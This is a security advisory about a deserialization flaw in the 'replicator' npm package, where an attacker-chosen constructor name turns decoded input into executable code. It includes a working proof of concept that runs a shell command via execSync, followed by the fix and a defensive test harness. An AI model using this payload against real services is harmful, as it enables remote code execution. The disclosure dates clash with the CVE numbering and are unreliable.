# Replicant: When Deserialization Starts Writing Your Scripts

## Vulnerability Overview

**Replicant** refers here to the `replicator` npm package (imported as `replicator` in the code below), a library for advanced JavaScript serialization and deserialization. The vulnerability (CVE-2022-2265) lives in its `decode` path: when an encoded error object is reconstructed, the `name` field of the serialized input is used to look up a constructor on the global object, and that constructor is then called on the `message` field. Because both fields are attacker-controlled, deserialization stops being passive data reconstruction and becomes a way for the input to choose which code runs.

**Vulnerability Category**

- CVE: CVE-2022-2265
- CWE-502: Deserialization of Untrusted Data
- Impact: Code execution primitive through unsafe constructor selection
- Component: Error transformation logic in the `replicator` decoding pipeline

## Impact Scope

- `replicator` is widely used, with approximately **1 million** monthly downloads
- Attackers control the `name` field and can therefore select any constructor reachable from the global object
- With `name` set to `"Function"`, the `message` field becomes the body of a newly compiled function
- `decode()` returns that function; any consumer that invokes the decoded value, or passes it somewhere that does, executes attacker-supplied source, which is remote code execution for a service that decodes network input

## Vulnerable Code (Pre-Fix)

```javascript
// Error transform, reconstruction step; val is the decoded "data" object from the input.
var Ctor = GLOBAL[val.name] || Error;   // any global constructor, e.g. Function, is reachable by name
var err = new Ctor(val.message);        // for Function, message is compiled as the function body
```

`val` is the decoded `data` object, so both `val.name` and `val.message` come straight from untrusted input. Nothing restricts `val.name` to error types: `"Function"` selects `GLOBAL.Function`, and `new Function(val.message)` compiles the attacker's string into a callable that is handed back as the "decoded error".
## POC Code

```javascript
const Replicator = require('replicator');

const replicator = new Replicator();

// Serialized error object with an attacker-chosen constructor name. Building the
// envelope with JSON.stringify avoids the quote-escaping mistakes of a hand-written
// JSON string (a \' escape inside JSON is invalid and makes the payload unparseable).
const payload = JSON.stringify({
  ctor: 'Error',
  data: {
    name: 'Function',   // resolves to GLOBAL.Function in the vulnerable decoder
    message: "require('child_process').execSync('open /System/Applications/Calculator.app')"
  }
});

// decode() returns new Function(message); the trailing () invokes it.
// A Function body runs in global scope, so `require` has to be reachable there
// (as it is in the Node REPL); from a CommonJS module the body would reach it
// through a global path such as process.mainModule.require instead.
replicator.decode(payload)();
```

**Payload Analysis:**

- `name` is attacker-controlled and set to `"Function"`, so the global `Function` constructor is selected
- `message` becomes the function body, so it is compiled rather than stored as an error message
- The decoded return value is a function; invoking it runs the payload

## Fix Solution (PR #19)

Replace the open global lookup with an explicit constructor allowlist:

```javascript
// Only the standard error constructors may be reconstructed from input.
var SAFE_ERROR_CTORS = {
  'Error':          Error,
  'EvalError':      EvalError,
  'RangeError':     RangeError,
  'ReferenceError': ReferenceError,
  'SyntaxError':    SyntaxError,
  'TypeError':      TypeError,
  'URIError':       URIError
};

var Ctor = SAFE_ERROR_CTORS[val.name] || Error;   // unknown names fall back to Error
var err = new Ctor(val.message);
```

**Core Fix Principles:**

1. **Explicit Type Allowlist**: Only known-safe error constructors can be selected by name; `Function` and every other global are unreachable.
2. **Safe Default**: Unknown values fall back to `Error` instead of resolving arbitrary global objects.

One caveat on the pattern as written: a plain object literal still inherits from `Object.prototype`, so a `name` of `"constructor"` resolves to `Object` rather than falling back to `Error`, and names such as `"toString"` resolve to non-constructor functions that throw on `new`. None of these reach `Function`, but a null-prototype object (`Object.create(null)`) or an own-property check (`hasOwnProperty`) makes the fallback behave as intended for every input.

## Practical Recommendations

**When Maintaining Serialization/Deserialization Logic:**

- Never resolve constructors from untrusted strings via the global scope
- Maintain a strict allowlist for each polymorphic type path, and look names up as own properties only
- Validate types and structures before reconstruction (for example, require `message` to be a string)
- Include negative security tests for unexpected constructor names such as `Function`, `constructor`, and `__proto__`

**When Using Replicant in Projects:**

- Upgrade to a version containing PR #19
- Treat decoded objects as untrusted input until validated by your own logic (an "error" that is callable should be rejected, not used)
- Audit downstream usage for places where decoded values are invoked, passed to `eval`-like APIs, or otherwise executed

## Disclosure Timeline

| Date | Event |
|:---|:---|
| 2021 | Checkmarx discloses CVE-2021-33420 |
| 2025-01-29 | "Replicant" discovered and reported |
| 2025-02-05 | PR #19 introduces constructor whitelist fix |
| 2025-02-10 | CVE-2022-2265 assigned |
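The following is an added example, not code from `replicator` or from PR #19. It models the error-reconstruction step quoted above in three forms (the pre-fix global lookup, the PR #19 allowlist as shown, and an own-property variant) together with the consumer-side guard the recommendations call for. A harmless `"return 6 * 7"` body replaces the Calculator payload so the demo runs anywhere, `globalThis` stands in for the library's `GLOBAL` reference, and all function and payload names are this example's own.

```javascript
'use strict';

// Stand-in for replicator's GLOBAL: a reference to the global object (assumption of this example).
const GLOBAL = globalThis;

// Pre-fix logic, as quoted on the page: any global constructor is reachable by name.
function reconstructErrorVulnerable(val) {
  const Ctor = GLOBAL[val.name] || Error;
  return new Ctor(val.message);
}

// Post-fix logic, as quoted on the page: allowlist held in a plain object literal.
const SAFE_ERROR_CTORS = {
  Error, EvalError, RangeError, ReferenceError, SyntaxError, TypeError, URIError,
};

function reconstructErrorAllowlist(val) {
  const Ctor = SAFE_ERROR_CTORS[val.name] || Error;
  return new Ctor(val.message);
}

// Own-property variant: names that exist only on Object.prototype ("constructor",
// "toString", "__proto__") no longer resolve, and message is forced to a string.
function reconstructErrorStrict(val) {
  const Ctor = Object.prototype.hasOwnProperty.call(SAFE_ERROR_CTORS, val.name)
    ? SAFE_ERROR_CTORS[val.name]
    : Error;
  return new Ctor(typeof val.message === 'string' ? val.message : '');
}

// Consumer-side guard (treat decoded values as untrusted): accept only genuine,
// non-callable Error instances and reject everything else before it can be invoked.
function assertDecodedIsPlainError(decoded) {
  if (typeof decoded === 'function') {
    throw new TypeError('decoded value is callable: refusing to use it');
  }
  if (!(decoded instanceof Error)) {
    throw new TypeError('decoded value is not an Error instance');
  }
  return decoded;
}

// Constructed payloads modelled on the PoC's "data" object, with a harmless body.
const PAYLOAD_FUNCTION = { name: 'Function', message: 'return 6 * 7' };
const PAYLOAD_PROTO = { name: 'constructor', message: 'x' }; // probes the plain-object allowlist
const PAYLOAD_BENIGN = { name: 'RangeError', message: 'out of range' };

function demo() {
  const results = {};

  // 1. Pre-fix: the input picks Function, reconstruction hands back a callable, and a
  //    caller that invokes the result runs attacker-supplied source (here: 6 * 7).
  const viaVulnerable = reconstructErrorVulnerable(PAYLOAD_FUNCTION);
  results.vulnerableIsFunction = typeof viaVulnerable === 'function';
  results.vulnerableCallResult = results.vulnerableIsFunction ? viaVulnerable() : undefined;

  // 2. Allowlist: "Function" is not a key, so the message is wrapped in a plain Error.
  const viaAllowlist = reconstructErrorAllowlist(PAYLOAD_FUNCTION);
  results.allowlistIsError = viaAllowlist instanceof Error && typeof viaAllowlist !== 'function';

  // 3. Prototype-chain leak in the plain-object allowlist: "constructor" resolves to
  //    Object, so the result is a String wrapper object, not the intended Error fallback.
  const leaked = reconstructErrorAllowlist(PAYLOAD_PROTO);
  results.allowlistProtoLeak = !(leaked instanceof Error);

  // 4. Own-property lookup closes that gap, and a legitimate name still round-trips.
  results.strictProtoIsError = reconstructErrorStrict(PAYLOAD_PROTO) instanceof Error;
  results.strictBenignIsRange = reconstructErrorStrict(PAYLOAD_BENIGN) instanceof RangeError;

  // 5. The consumer guard catches the callable even if the decoder was never patched.
  try {
    assertDecodedIsPlainError(viaVulnerable);
    results.guardRejectedCallable = false;
  } catch (e) {
    results.guardRejectedCallable = e instanceof TypeError;
  }

  return results;
}

console.log(demo());
```

The `constructor` probe is the negative test worth keeping in a suite: it passes against the strict variant and fails against the plain-object allowlist, which is exactly the difference between "unknown names fall back to `Error`" as intended and as implemented. The guard in step 5 is the cheap defence-in-depth a consumer can add without waiting on an upstream fix.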